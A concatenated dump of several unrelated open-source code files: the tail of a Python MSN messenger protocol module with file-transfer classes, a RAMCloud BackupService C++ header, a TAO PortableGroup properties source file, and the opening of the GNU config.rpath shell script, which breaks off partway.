pass\n\n def userJoined(self, userHandle, 
screenName):\n \"\"\"\n called when a user has joined the conversation.\n\n @param userHandle: the user handle (passport) of the user\n @param screenName: the screen name of the user\n \"\"\"\n pass\n\n def userLeft(self, userHandle):\n \"\"\"\n called when a user has left the conversation.\n\n @param userHandle: the user handle (passport) of the user.\n \"\"\"\n pass\n\n def gotMessage(self, message):\n \"\"\"\n called when we receive a message.\n\n @param message: the associated MSNMessage object\n \"\"\"\n pass\n\n def userTyping(self, message):\n \"\"\"\n called when we receive the special type of message notifying\n us that a user is typing a message.\n\n @param message: the associated MSNMessage object\n \"\"\"\n pass\n\n def gotSendRequest(self, fileName, fileSize, iCookie, message):\n \"\"\"\n called when a contact is trying to send us a file.\n To accept or reject this transfer see the\n fileInvitationReply method.\n\n @param fileName: the name of the file\n @param fileSize: the size of the file\n @param iCookie: the invitation cookie, used so the client can\n match up your reply with this request.\n @param message: the MSNMessage object which brought about this\n invitation (it may contain more information)\n \"\"\"\n pass\n\n # api calls\n\n def inviteUser(self, userHandle):\n \"\"\"\n used to invite a user to the current switchboard server.\n\n @param userHandle: the user handle (passport) of the desired user.\n\n @return: A Deferred, the callback for which will be called\n when the server notifies us that the user has indeed\n been invited. The callback argument will be a tuple\n with 1 element, the sessionID given to the invited user.\n I'm not sure if this is useful or not.\n \"\"\"\n\n id, d = self._createIDMapping()\n self.sendLine(\"CAL %s %s\" % (id, userHandle))\n return d\n\n def sendMessage(self, message):\n \"\"\"\n used to send a message.\n\n @param message: the corresponding MSNMessage object.\n\n @return: Depending on the value of message.ack.\n If set to MSNMessage.MESSAGE_ACK or\n MSNMessage.MESSAGE_NACK a Deferred will be returned,\n the callback for which will be fired when an ACK or\n NACK is received - the callback argument will be\n (None,). If set to MSNMessage.MESSAGE_ACK_NONE then\n the return value is None.\n \"\"\"\n\n if message.ack not in ('A','N'):\n id, d = self._nextTransactionID(), None\n else:\n id, d = self._createIDMapping()\n if message.length == 0:\n message.length = message._calcMessageLen()\n self.sendLine(\"MSG %s %s %s\" % (id, message.ack, message.length))\n # apparently order matters with at least MIME-Version and Content-Type\n self.sendLine('MIME-Version: %s' % message.getHeader('MIME-Version'))\n self.sendLine('Content-Type: %s' % message.getHeader('Content-Type'))\n # send the rest of the headers\n for header in [h for h in message.headers.items() if h[0].lower() not in ('mime-version','content-type')]:\n self.sendLine(\"%s: %s\" % (header[0], header[1]))\n self.transport.write(CR+LF)\n self.transport.write(message.message)\n return d\n\n def sendTypingNotification(self):\n \"\"\"\n used to send a typing notification. 
Upon receiving this\n message the official client will display a 'user is typing'\n message to all other users in the chat session for 10 seconds.\n The official client sends one of these every 5 seconds (I think)\n as long as you continue to type.\n \"\"\"\n m = MSNMessage()\n m.ack = m.MESSAGE_ACK_NONE\n m.setHeader('Content-Type', 'text/x-msmsgscontrol')\n m.setHeader('TypingUser', self.userHandle)\n m.message = \"\\r\\n\"\n self.sendMessage(m)\n\n def sendFileInvitation(self, fileName, fileSize):\n \"\"\"\n send an notification that we want to send a file.\n\n @param fileName: the file name\n @param fileSize: the file size\n\n @return: A Deferred, the callback of which will be fired\n when the user responds to this invitation with an\n appropriate message. The callback argument will be\n a tuple with 3 elements, the first being 1 or 0\n depending on whether they accepted the transfer\n (1=yes, 0=no), the second being an invitation cookie\n to identify your follow-up responses and the third being\n the message 'info' which is a dict of information they\n sent in their reply (this doesn't really need to be used).\n If you wish to proceed with the transfer see the\n sendTransferInfo method.\n \"\"\"\n cookie = self._newInvitationCookie()\n d = Deferred()\n m = MSNMessage()\n m.setHeader('Content-Type', 'text/x-msmsgsinvite; charset=UTF-8')\n m.message += 'Application-Name: File Transfer\\r\\n'\n m.message += 'Application-GUID: %s\\r\\n' % (classNameToGUID[\"file transfer\"],)\n m.message += 'Invitation-Command: INVITE\\r\\n'\n m.message += 'Invitation-Cookie: %s\\r\\n' % str(cookie)\n m.message += 'Application-File: %s\\r\\n' % fileName\n m.message += 'Application-FileSize: %s\\r\\n\\r\\n' % str(fileSize)\n m.ack = m.MESSAGE_ACK_NONE\n self.sendMessage(m)\n self.cookies['iCookies'][cookie] = (d, m)\n return d\n\n def fileInvitationReply(self, iCookie, accept=1):\n \"\"\"\n used to reply to a file transfer invitation.\n\n @param iCookie: the invitation cookie of the initial invitation\n @param accept: whether or not you accept this transfer,\n 1 = yes, 0 = no, default = 1.\n\n @return: A Deferred, the callback for which will be fired when\n the user responds with the transfer information.\n The callback argument will be a tuple with 5 elements,\n whether or not they wish to proceed with the transfer\n (1=yes, 0=no), their ip, the port, the authentication\n cookie (see FileReceive/FileSend) and the message\n info (dict) (in case they send extra header-like info\n like Internal-IP, this doesn't necessarily need to be\n used). 
If you wish to proceed with the transfer see\n FileReceive.\n \"\"\"\n d = Deferred()\n m = MSNMessage()\n m.setHeader('Content-Type', 'text/x-msmsgsinvite; charset=UTF-8')\n m.message += 'Invitation-Command: %s\\r\\n' % (accept and 'ACCEPT' or 'CANCEL')\n m.message += 'Invitation-Cookie: %s\\r\\n' % str(iCookie)\n if not accept:\n m.message += 'Cancel-Code: REJECT\\r\\n'\n m.message += 'Launch-Application: FALSE\\r\\n'\n m.message += 'Request-Data: IP-Address:\\r\\n'\n m.message += '\\r\\n'\n m.ack = m.MESSAGE_ACK_NONE\n self.sendMessage(m)\n self.cookies['external'][iCookie] = (d, m)\n return d\n\n def sendTransferInfo(self, accept, iCookie, authCookie, ip, port):\n \"\"\"\n send information relating to a file transfer session.\n\n @param accept: whether or not to go ahead with the transfer\n (1=yes, 0=no)\n @param iCookie: the invitation cookie of previous replies\n relating to this transfer\n @param authCookie: the authentication cookie obtained from\n a FileSend instance\n @param ip: your ip\n @param port: the port on which a FileSend protocol is listening.\n \"\"\"\n m = MSNMessage()\n m.setHeader('Content-Type', 'text/x-msmsgsinvite; charset=UTF-8')\n m.message += 'Invitation-Command: %s\\r\\n' % (accept and 'ACCEPT' or 'CANCEL')\n m.message += 'Invitation-Cookie: %s\\r\\n' % iCookie\n m.message += 'IP-Address: %s\\r\\n' % ip\n m.message += 'Port: %s\\r\\n' % port\n m.message += 'AuthCookie: %s\\r\\n' % authCookie\n m.message += '\\r\\n'\n m.ack = m.MESSAGE_NACK\n self.sendMessage(m)\n\nclass FileReceive(LineReceiver):\n \"\"\"\n This class provides support for receiving files from contacts.\n\n @ivar fileSize: the size of the receiving file. (you will have to set this)\n @ivar connected: true if a connection has been established.\n @ivar completed: true if the transfer is complete.\n @ivar bytesReceived: number of bytes (of the file) received.\n This does not include header data.\n \"\"\"\n\n def __init__(self, auth, myUserHandle, file, directory=\"\", overwrite=0):\n \"\"\"\n @param auth: auth string received in the file invitation.\n @param myUserHandle: your userhandle.\n @param file: A string or file object representing the file\n to save data to.\n @param directory: optional parameter specifying the directory.\n Defaults to the current directory.\n @param overwrite: if true and a file of the same name exists on\n your system, it will be overwritten. 
(0 by default)\n \"\"\"\n self.auth = auth\n self.myUserHandle = myUserHandle\n self.fileSize = 0\n self.connected = 0\n self.completed = 0\n self.directory = directory\n self.bytesReceived = 0\n self.overwrite = overwrite\n\n # used for handling current received state\n self.state = 'CONNECTING'\n self.segmentLength = 0\n self.buffer = ''\n\n if isinstance(file, types.StringType):\n path = os.path.join(directory, file)\n if os.path.exists(path) and not self.overwrite:\n log.msg('File already exists...')\n raise IOError, \"File Exists\" # is this all we should do here?\n self.file = open(os.path.join(directory, file), 'wb')\n else:\n self.file = file\n\n def connectionMade(self):\n self.connected = 1\n self.state = 'INHEADER'\n self.sendLine('VER MSNFTP')\n\n def connectionLost(self, reason):\n self.connected = 0\n self.file.close()\n\n def parseHeader(self, header):\n \"\"\" parse the header of each 'message' to obtain the segment length \"\"\"\n\n if ord(header[0]) != 0: # they requested that we close the connection\n self.transport.loseConnection()\n return\n try:\n extra, factor = header[1:]\n except ValueError:\n # munged header, ending transfer\n self.transport.loseConnection()\n raise\n extra = ord(extra)\n factor = ord(factor)\n return factor * 256 + extra\n\n def lineReceived(self, line):\n temp = line.split()\n if len(temp) == 1:\n params = []\n else:\n params = temp[1:]\n cmd = temp[0]\n handler = getattr(self, \"handle_%s\" % cmd.upper(), None)\n if handler:\n handler(params) # try/except\n else:\n self.handle_UNKNOWN(cmd, params)\n\n def rawDataReceived(self, data):\n bufferLen = len(self.buffer)\n if self.state == 'INHEADER':\n delim = 3-bufferLen\n self.buffer += data[:delim]\n if len(self.buffer) == 3:\n self.segmentLength = self.parseHeader(self.buffer)\n if not self.segmentLength:\n return # hrm\n self.buffer = \"\"\n self.state = 'INSEGMENT'\n extra = data[delim:]\n if len(extra) > 0:\n self.rawDataReceived(extra)\n return\n\n elif self.state == 'INSEGMENT':\n dataSeg = data[:(self.segmentLength-bufferLen)]\n self.buffer += dataSeg\n self.bytesReceived += len(dataSeg)\n if len(self.buffer) == self.segmentLength:\n self.gotSegment(self.buffer)\n self.buffer = \"\"\n if self.bytesReceived == self.fileSize:\n self.completed = 1\n self.buffer = \"\"\n self.file.close()\n self.sendLine(\"BYE 16777989\")\n return\n self.state = 'INHEADER'\n extra = data[(self.segmentLength-bufferLen):]\n if len(extra) > 0:\n self.rawDataReceived(extra)\n return\n\n def handle_VER(self, params):\n checkParamLen(len(params), 1, 'VER')\n if params[0].upper() == \"MSNFTP\":\n self.sendLine(\"USR %s %s\" % (self.myUserHandle, self.auth))\n else:\n log.msg('they sent the wrong version, time to quit this transfer')\n self.transport.loseConnection()\n\n def handle_FIL(self, params):\n checkParamLen(len(params), 1, 'FIL')\n try:\n self.fileSize = int(params[0])\n except ValueError: # they sent the wrong file size - probably want to log this\n self.transport.loseConnection()\n return\n self.setRawMode()\n self.sendLine(\"TFR\")\n\n def handle_UNKNOWN(self, cmd, params):\n log.msg('received unknown command (%s), params: %s' % (cmd, params))\n\n def gotSegment(self, data):\n \"\"\" called when a segment (block) of data arrives. 
\"\"\"\n self.file.write(data)\n\nclass FileSend(LineReceiver):\n \"\"\"\n This class provides support for sending files to other contacts.\n\n @ivar bytesSent: the number of bytes that have currently been sent.\n @ivar completed: true if the send has completed.\n @ivar connected: true if a connection has been established.\n @ivar targetUser: the target user (contact).\n @ivar segmentSize: the segment (block) size.\n @ivar auth: the auth cookie (number) to use when sending the\n transfer invitation\n \"\"\"\n\n def __init__(self, file):\n \"\"\"\n @param file: A string or file object represnting the file to send.\n \"\"\"\n\n if isinstance(file, types.StringType):\n self.file = open(file, 'rb')\n else:\n self.file = file\n\n self.fileSize = 0\n self.bytesSent = 0\n self.completed = 0\n self.connected = 0\n self.targetUser = None\n self.segmentSize = 2045\n self.auth = randint(0, 2**30)\n self._pendingSend = None # :(\n\n def connectionMade(self):\n self.connected = 1\n\n def connectionLost(self, reason):\n if self._pendingSend.active():\n self._pendingSend.cancel()\n self._pendingSend = None\n if self.bytesSent == self.fileSize:\n self.completed = 1\n self.connected = 0\n self.file.close()\n\n def lineReceived(self, line):\n temp = line.split()\n if len(temp) == 1:\n params = []\n else:\n params = temp[1:]\n cmd = temp[0]\n handler = getattr(self, \"handle_%s\" % cmd.upper(), None)\n if handler:\n handler(params)\n else:\n self.handle_UNKNOWN(cmd, params)\n\n def handle_VER(self, params):\n checkParamLen(len(params), 1, 'VER')\n if params[0].upper() == \"MSNFTP\":\n self.sendLine(\"VER MSNFTP\")\n else: # they sent some weird version during negotiation, i'm quitting.\n self.transport.loseConnection()\n\n def handle_USR(self, params):\n checkParamLen(len(params), 2, 'USR')\n self.targetUser = params[0]\n if self.auth == int(params[1]):\n self.sendLine(\"FIL %s\" % (self.fileSize))\n else: # they failed the auth test, disconnecting.\n self.transport.loseConnection()\n\n def handle_TFR(self, params):\n checkParamLen(len(params), 0, 'TFR')\n # they are ready for me to start sending\n self.sendPart()\n\n def handle_BYE(self, params):\n self.completed = (self.bytesSent == self.fileSize)\n self.transport.loseConnection()\n\n def handle_CCL(self, params):\n self.completed = (self.bytesSent == self.fileSize)\n self.transport.loseConnection()\n\n def handle_UNKNOWN(self, cmd, params):\n log.msg('received unknown command (%s), params: %s' % (cmd, params))\n\n def makeHeader(self, size):\n \"\"\" make the appropriate header given a specific segment size. 
\"\"\"\n quotient, remainder = divmod(size, 256)\n return chr(0) + chr(remainder) + chr(quotient)\n\n def sendPart(self):\n \"\"\" send a segment of data \"\"\"\n if not self.connected:\n self._pendingSend = None\n return # may be buggy (if handle_CCL/BYE is called but self.connected is still 1)\n data = self.file.read(self.segmentSize)\n if data:\n dataSize = len(data)\n header = self.makeHeader(dataSize)\n self.bytesSent += dataSize\n self.transport.write(header + data)\n self._pendingSend = reactor.callLater(0, self.sendPart)\n else:\n self._pendingSend = None\n self.completed = 1\n\n# mapping of error codes to error messages\nerrorCodes = {\n\n 200 : \"Syntax error\",\n 201 : \"Invalid parameter\",\n 205 : \"Invalid user\",\n 206 : \"Domain name missing\",\n 207 : \"Already logged in\",\n 208 : \"Invalid username\",\n 209 : \"Invalid screen name\",\n 210 : \"User list full\",\n 215 : \"User already there\",\n 216 : \"User already on list\",\n 217 : \"User not online\",\n 218 : \"Already in mode\",\n 219 : \"User is in the opposite list\",\n 223 : \"Too many groups\",\n 224 : \"Invalid group\",\n 225 : \"User not in group\",\n 229 : \"Group name too long\",\n 230 : \"Cannot remove group 0\",\n 231 : \"Invalid group\",\n 280 : \"Switchboard failed\",\n 281 : \"Transfer to switchboard failed\",\n\n 300 : \"Required field missing\",\n 301 : \"Too many FND responses\",\n 302 : \"Not logged in\",\n\n 500 : \"Internal server error\",\n 501 : \"Database server error\",\n 502 : \"Command disabled\",\n 510 : \"File operation failed\",\n 520 : \"Memory allocation failed\",\n 540 : \"Wrong CHL value sent to server\",\n\n 600 : \"Server is busy\",\n 601 : \"Server is unavaliable\",\n 602 : \"Peer nameserver is down\",\n 603 : \"Database connection failed\",\n 604 : \"Server is going down\",\n 605 : \"Server unavailable\",\n\n 707 : \"Could not create connection\",\n 710 : \"Invalid CVR parameters\",\n 711 : \"Write is blocking\",\n 712 : \"Session is overloaded\",\n 713 : \"Too many active users\",\n 714 : \"Too many sessions\",\n 715 : \"Not expected\",\n 717 : \"Bad friend file\",\n 731 : \"Not expected\",\n\n 800 : \"Requests too rapid\",\n\n 910 : \"Server too busy\",\n 911 : \"Authentication failed\",\n 912 : \"Server too busy\",\n 913 : \"Not allowed when offline\",\n 914 : \"Server too busy\",\n 915 : \"Server too busy\",\n 916 : \"Server too busy\",\n 917 : \"Server too busy\",\n 918 : \"Server too busy\",\n 919 : \"Server too busy\",\n 920 : \"Not accepting new users\",\n 921 : \"Server too busy\",\n 922 : \"Server too busy\",\n 923 : \"No parent consent\",\n 924 : \"Passport account not yet verified\"\n\n}\n\n# mapping of status codes to readable status format\nstatusCodes = {\n\n STATUS_ONLINE : \"Online\",\n STATUS_OFFLINE : \"Offline\",\n STATUS_HIDDEN : \"Appear Offline\",\n STATUS_IDLE : \"Idle\",\n STATUS_AWAY : \"Away\",\n STATUS_BUSY : \"Busy\",\n STATUS_BRB : \"Be Right Back\",\n STATUS_PHONE : \"On the Phone\",\n STATUS_LUNCH : \"Out to Lunch\"\n\n}\n\n# mapping of list ids to list codes\nlistIDToCode = {\n\n FORWARD_LIST : 'fl',\n BLOCK_LIST : 'bl',\n ALLOW_LIST : 'al',\n REVERSE_LIST : 'rl'\n\n}\n\n# mapping of list codes to list ids\nlistCodeToID = {}\nfor id,code in listIDToCode.items():\n listCodeToID[code] = id\n\ndel id, code\n\n# Mapping of class GUIDs to simple english names\nguidToClassName = {\n \"{5D3E02AB-6190-11d3-BBBB-00C04F795683}\": \"file transfer\",\n }\n\n# Reverse of the above\nclassNameToGUID = {}\nfor guid, name in guidToClassName.iteritems():\n 
classNameToGUID[name] = guid\n"} {"text": "/* Copyright (c) 2009-2012 Stanford University\n *\n * Permission to use, copy, modify, and distribute this software for any\n * purpose with or without fee is hereby granted, provided that the above\n * copyright notice and this permission notice appear in all copies.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR(S) DISCLAIM ALL WARRANTIES\n * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL AUTHORS BE LIABLE FOR\n * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n */\n\n#ifndef RAMCLOUD_BACKUPSERVICE_H\n#define RAMCLOUD_BACKUPSERVICE_H\n\n#include \n#include \n\n#include \"Common.h\"\n#include \"BackupClient.h\"\n#include \"BackupMasterRecovery.h\"\n#include \"BackupStorage.h\"\n#include \"CoordinatorClient.h\"\n#include \"MasterClient.h\"\n#include \"Service.h\"\n#include \"ServerConfig.h\"\n#include \"TaskQueue.h\"\n\nnamespace RAMCloud {\n\n/**\n * Handles rpc requests from Masters and the Coordinator to persistently store\n * replicas of segments and to facilitate the recovery of object data when\n * masters crash.\n */\nclass BackupService : public Service\n , ServerTracker::Callback {\n PUBLIC:\n BackupService(Context* context, const ServerConfig* config);\n virtual ~BackupService();\n void benchmark();\n void dispatch(WireFormat::Opcode opcode, Rpc* rpc);\n ServerId getFormerServerId() const;\n ServerId getServerId() const;\n uint32_t getReadSpeed() { return readSpeed; }\n\n PRIVATE:\n void freeSegment(const WireFormat::BackupFree::Request* reqHdr,\n WireFormat::BackupFree::Response* respHdr,\n Rpc* rpc);\n void getRecoveryData(\n const WireFormat::BackupGetRecoveryData::Request* reqHdr,\n WireFormat::BackupGetRecoveryData::Response* respHdr,\n Rpc* rpc);\n void killAllStorage();\n void recoveryComplete(\n const WireFormat::BackupRecoveryComplete::Request* reqHdr,\n WireFormat::BackupRecoveryComplete::Response* respHdr,\n Rpc* rpc);\n void restartFromStorage();\n void startReadingData(\n const WireFormat::BackupStartReadingData::Request* reqHdr,\n WireFormat::BackupStartReadingData::Response* respHdr,\n Rpc* rpc);\n void startPartitioningReplicas(\n const WireFormat::BackupStartPartitioningReplicas::Request* reqHdr,\n WireFormat::BackupStartPartitioningReplicas::Response* respHdr,\n Rpc* rpc);\n void writeSegment(const WireFormat::BackupWrite::Request* req,\n WireFormat::BackupWrite::Response* resp,\n Rpc* rpc);\n void gcMain();\n void initOnceEnlisted();\n void trackerChangesEnqueued();\n\n /**\n * Shared RAMCloud information.\n */\n Context* context;\n\n /**\n * Provides mutual exclusion between handling RPCs and garbage collector.\n * Locked once for all RPCs in dispatch().\n */\n std::mutex mutex;\n typedef std::mutex Mutex;\n typedef std::unique_lock Lock;\n\n /// Settings passed to the constructor\n const ServerConfig* config;\n\n /**\n * If the backup was formerly part of a cluster this was its server id.\n * This is extracted from a superblock that is part of BackupStorage.\n * \"Rejoining\" means this backup service may have segment replicas stored\n * that were created by masters in the cluster.\n * In this case, the coordinator must be made told of the former server\n * id under which these replicas were created 
in order to ensure that\n * all masters are made aware of the former server's crash before learning\n * of its re-enlistment.\n */\n ServerId formerServerId;\n\n /**\n * The storage backend where closed segments are to be placed.\n * Must come before #frames so that if the reference count of some frames\n * drops to zero when the map is destroyed won't have been destroyed yet\n * in the storage instance.\n */\n PUBLIC:\n std::unique_ptr storage;\n PRIVATE:\n\n /// Type of the key for the frame map.\n struct MasterSegmentIdPair {\n MasterSegmentIdPair(ServerId masterId, uint64_t segmentId)\n : masterId(masterId)\n , segmentId(segmentId)\n {\n }\n\n /// Comparison is needed for the type to be a key in a map.\n bool\n operator<(const MasterSegmentIdPair& right) const\n {\n return std::make_pair(*masterId, segmentId) <\n std::make_pair(*right.masterId, right.segmentId);\n }\n\n ServerId masterId;\n uint64_t segmentId;\n };\n /// Type of the frame map.\n typedef std::map FrameMap;\n /**\n * Mapping from (MasterId, SegmentId) to a BackupStorage::FrameRef for\n * replicas that are currently open or in storage.\n */\n FrameMap frames;\n\n /**\n * Master recoveries this backup is participating in; maps a crashed master\n * id to the most recent recovery that was started for it. Entries\n * added in startReadingData and removed by garbage collection tasks when\n * the crashed master is marked as down in the server list.\n */\n std::map recoveries;\n\n /// The uniform size of each segment this backup deals with.\n const uint32_t segmentSize;\n\n /// The results of storage.benchmark() in MB/s.\n uint32_t readSpeed;\n\n /// For unit testing.\n uint64_t bytesWritten;\n\n /// Used to ensure that init() is invoked before the dispatcher runs.\n bool initCalled;\n\n /// Used to determine server status of masters for garbage collection.\n ServerTracker gcTracker;\n\n /// Runs garbage collection tasks.\n Tub gcThread;\n\n /// For testing; don't start gcThread when tracker changes are enqueued.\n bool testingDoNotStartGcThread;\n\n /// Set during unit tests to skip the check that ensures the caller is\n /// actually in the cluster.\n bool testingSkipCallerIdCheck;\n\n /**\n * Executes enqueued tasks for replica garbage collection and master\n * recovery.\n */\n TaskQueue taskQueue;\n\n /**\n * Counts old replicas (those that existed at startup) that have\n * not yet been freed by the garbage collector. This value should\n * become zero pretty soon after startup.\n */\n int oldReplicas;\n\n /**\n * Try to garbage collect replicas from a particular master found on disk\n * until it is finally removed. 
Usually replicas are freed explicitly by\n * masters, but this doesn't work for cases where the replica was found on\n * disk as part of an old master.\n *\n * This task may generate RPCs to the master to determine the status of the\n * replica which survived on-storage across backup failures.\n */\n class GarbageCollectReplicasFoundOnStorageTask : public Task {\n PUBLIC:\n GarbageCollectReplicasFoundOnStorageTask(BackupService& service,\n ServerId masterId);\n void addSegmentId(uint64_t segmentId);\n void performTask();\n\n PRIVATE:\n bool tryToFreeReplica(uint64_t segmentId);\n void deleteReplica(uint64_t segmentId);\n\n /// Backup which is trying to garbage collect the replica.\n BackupService& service;\n\n /// Id of the master which originally created the replica.\n ServerId masterId;\n\n /// Segment ids of the replicas which are candidates for removal.\n std::deque segmentIds;\n\n /**\n * Space for a rpc to the master to ask it explicitly if it would\n * like this replica to be retain as it makes more replica elsewhere.\n */\n Tub rpc;\n\n DISALLOW_COPY_AND_ASSIGN(GarbageCollectReplicasFoundOnStorageTask);\n };\n friend class GarbageCollectReplicaFoundOnStorageTask;\n\n /**\n * Garbage collect all state for a now down master. This includes any\n * replicas created by it as well as any outstanding recovery state for it.\n * Downed servers are known to be fully recovered and out of the cluster, so\n * this is safe. Usually replicas are freed explicitly by masters, but this\n * doesn't work for cases where the replica was created by a master which\n * has crashed.\n */\n class GarbageCollectDownServerTask : public Task {\n PUBLIC:\n GarbageCollectDownServerTask(BackupService& service, ServerId masterId);\n void performTask();\n\n PRIVATE:\n /// Backup trying to garbage collect replicas from some removed master.\n BackupService& service;\n\n /// Id of the master now known to have been removed from the cluster.\n ServerId masterId;\n\n DISALLOW_COPY_AND_ASSIGN(GarbageCollectDownServerTask);\n };\n friend class GarbageCollectDownServerTask;\n\n DISALLOW_COPY_AND_ASSIGN(BackupService);\n};\n\n} // namespace RAMCloud\n\n#endif\n"} {"text": "// -*- C++ -*-\n\n//=============================================================================\n/**\n * @file PG_Properties_Support.cpp\n *\n * This file implements classes to help manage PortableGroup::Properties\n *\n * @author Dale Wilson \n */\n//=============================================================================\n\n#include \"orbsvcs/PortableGroup/PG_Properties_Support.h\"\n\nTAO_BEGIN_VERSIONED_NAMESPACE_DECL\n\nTAO::PG_Properties_Support::PG_Properties_Support ()\n{\n TAO::PG_Property_Set *props;\n ACE_NEW_THROW_EX (props,\n TAO::PG_Property_Set (),\n CORBA::NO_MEMORY());\n this->default_properties_.reset (props);\n}\n\nTAO::PG_Properties_Support::~PG_Properties_Support ()\n{\n this->properties_map_.unbind_all ();\n}\n\nvoid TAO::PG_Properties_Support::set_default_property (const char * name,\n const PortableGroup::Value & value)\n{\n this->default_properties_->set_property(name, value);\n}\n\nvoid TAO::PG_Properties_Support::set_default_properties (const PortableGroup::Properties & props)\n{\n this->default_properties_->decode (props);\n}\n\nPortableGroup::Properties *\nTAO::PG_Properties_Support::get_default_properties ()\n{\n PortableGroup::Properties_var result;\n ACE_NEW_THROW_EX ( result, PortableGroup::Properties(), CORBA::NO_MEMORY());\n this->default_properties_->export_properties (*result);\n return result._retn ();\n}\n\nvoid 
TAO::PG_Properties_Support::remove_default_properties (\n const PortableGroup::Properties & props)\n{\n this->default_properties_->remove (props);\n}\n\nvoid\nTAO::PG_Properties_Support::set_type_properties (\n const char *type_id,\n const PortableGroup::Properties & overrides)\n{\n ACE_GUARD (TAO_SYNCH_MUTEX, guard, this->internals_);\n\n TAO::PG_Property_Set_var typeid_properties;\n if ( 0 != this->properties_map_.find (type_id, typeid_properties))\n {\n TAO::PG_Property_Set *props;\n ACE_NEW_THROW_EX (props,\n TAO::PG_Property_Set (overrides,\n this->default_properties_),\n CORBA::NO_MEMORY());\n typeid_properties.reset (props);\n this->properties_map_.bind (type_id, typeid_properties);\n }\n typeid_properties->clear ();\n typeid_properties->decode (overrides);\n}\n\nPortableGroup::Properties *\nTAO::PG_Properties_Support::get_type_properties (\n const char *type_id)\n{\n PortableGroup::Properties_var result;\n ACE_NEW_THROW_EX (result, PortableGroup::Properties(), CORBA::NO_MEMORY ());\n\n ACE_GUARD_RETURN (TAO_SYNCH_MUTEX, guard, this->internals_, 0);\n\n TAO::PG_Property_Set_var typeid_properties;\n if ( 0 != this->properties_map_.find (type_id, typeid_properties))\n {\n typeid_properties->export_properties (*result);\n }\n return result._retn ();\n}\n\nvoid\nTAO::PG_Properties_Support::remove_type_properties (\n const char *type_id,\n const PortableGroup::Properties & props)\n{\n // NOTE: do not actually delete the properties for this type.\n // There may be object groups depending on these.\n // Reference counted pointers could be used to allow property sets\n // for unused typeids to be deleted.\n\n ACE_GUARD (TAO_SYNCH_MUTEX, guard, this->internals_);\n\n TAO::PG_Property_Set_var typeid_properties;\n if ( 0 != this->properties_map_.find (type_id, typeid_properties))\n {\n typeid_properties->remove (props);\n }\n}\n\n\nTAO::PG_Property_Set_var\nTAO::PG_Properties_Support::find_typeid_properties (const char *type_id)\n{\n TAO::PG_Property_Set_var result;\n ACE_GUARD_RETURN (TAO_SYNCH_MUTEX, guard, this->internals_, result);\n\n if ( 0 != this->properties_map_.find (type_id, result))\n {\n TAO::PG_Property_Set * props;\n ACE_NEW_THROW_EX (props,\n TAO::PG_Property_Set (this->default_properties_),\n CORBA::NO_MEMORY());\n result.reset (props);\n this->properties_map_.bind (type_id, result);\n }\n return result;\n}\n\nTAO_END_VERSIONED_NAMESPACE_DECL\n"} {"text": "#! /bin/sh\n# Output a system dependent set of variables, describing how to set the\n# run time search path of shared libraries in an executable.\n#\n# Copyright 1996-2007 Free Software Foundation, Inc.\n# Taken from GNU libtool, 2001\n# Originally by Gordon Matzigkeit , 1996\n#\n# This file is free software; the Free Software Foundation gives\n# unlimited permission to copy and/or distribute it, with or without\n# modifications, as long as this notice is preserved.\n#\n# The first argument passed to this file is the canonical host specification,\n# CPU_TYPE-MANUFACTURER-OPERATING_SYSTEM\n# or\n# CPU_TYPE-MANUFACTURER-KERNEL-OPERATING_SYSTEM\n# The environment variables CC, GCC, LDFLAGS, LD, with_gnu_ld\n# should be set by the caller.\n#\n# The set of defined variables is at the end of this script.\n\n# Known limitations:\n# - On IRIX 6.5 with CC=\"cc\", the run time search patch must not be longer\n# than 256 bytes, otherwise the compiler driver will dump core. 
The only\n# known workaround is to choose shorter directory names for the build\n# directory and/or the installation directory.\n\n# All known linkers require a `.a' archive for static linking (except MSVC,\n# which needs '.lib').\nlibext=a\nshrext=.so\n\nhost=\"$1\"\nhost_cpu=`echo \"$host\" | sed 's/^\\([^-]*\\)-\\([^-]*\\)-\\(.*\\)$/\\1/'`\nhost_vendor=`echo \"$host\" | sed 's/^\\([^-]*\\)-\\([^-]*\\)-\\(.*\\)$/\\2/'`\nhost_os=`echo \"$host\" | sed 's/^\\([^-]*\\)-\\([^-]*\\)-\\(.*\\)$/\\3/'`\n\n# Code taken from libtool.m4's _LT_CC_BASENAME.\n\nfor cc_temp in $CC\"\"; do\n case $cc_temp in\n compile | *[\\\\/]compile | ccache | *[\\\\/]ccache ) ;;\n distcc | *[\\\\/]distcc | purify | *[\\\\/]purify ) ;;\n \\-*) ;;\n *) break;;\n esac\ndone\ncc_basename=`echo \"$cc_temp\" | sed -e 's%^.*/%%'`\n\n# Code taken from libtool.m4's AC_LIBTOOL_PROG_COMPILER_PIC.\n\nwl=\nif test \"$GCC\" = yes; then\n wl='-Wl,'\nelse\n case \"$host_os\" in\n aix*)\n wl='-Wl,'\n ;;\n darwin*)\n case $cc_basename in\n xlc*)\n wl='-Wl,'\n ;;\n esac\n ;;\n mingw* | cygwin* | pw32* | os2*)\n ;;\n hpux9* | hpux10* | hpux11*)\n wl='-Wl,'\n ;;\n irix5* | irix6* | nonstopux*)\n wl='-Wl,'\n ;;\n newsos6)\n ;;\n linux* | k*bsd*-gnu)\n case $cc_basename in\n icc* | ecc*)\n wl='-Wl,'\n ;;\n pgcc | pgf77 | pgf90)\n wl='-Wl,'\n ;;\n ccc*)\n wl='-Wl,'\n ;;\n como)\n wl='-lopt='\n ;;\n *)\n case `$CC -V 2>&1 | sed 5q` in\n *Sun\\ C*)\n wl='-Wl,'\n ;;\n esac\n ;;\n esac\n ;;\n osf3* | osf4* | osf5*)\n wl='-Wl,'\n ;;\n rdos*)\n ;;\n solaris*)\n wl='-Wl,'\n ;;\n sunos4*)\n wl='-Qoption ld '\n ;;\n sysv4 | sysv4.2uw2* | sysv4.3*)\n wl='-Wl,'\n ;;\n sysv4*MP*)\n ;;\n sysv5* | unixware* | sco3.2v5* | sco5v6* | OpenUNIX*)\n wl='-Wl,'\n ;;\n unicos*)\n wl='-Wl,'\n ;;\n uts4*)\n ;;\n esac\nfi\n\n# Code taken from libtool.m4's 